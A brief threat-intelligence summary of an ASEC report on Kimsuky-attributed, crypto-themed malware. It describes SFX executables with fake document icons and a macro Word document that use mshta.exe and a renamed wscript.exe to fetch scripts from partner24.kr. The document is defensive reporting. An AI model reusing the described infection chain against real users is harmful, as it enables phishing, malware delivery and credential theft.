ASEC reports coin exchange and investment-themed malware distributed as SFX executables disguised with Word/PDF icons and as a macro-enabled Word document. The SFX samples opened decoy documents while using mshta.exe to run scripts from partner24.kr paths, and the Word variant copied wscript.exe as word.exe, downloaded a Base64-encoded script from the same infrastructure, and executed it as set.sl. ASEC suspected Kimsuky involvement based on the unusual “Chnome” User-Agent in the macro and shared coin-themed filenames/C2 infrastructure across the samples. Although the final C2 script was unavailable during analysis, the chain could support credential theft, additional malware download, and other operator-directed actions.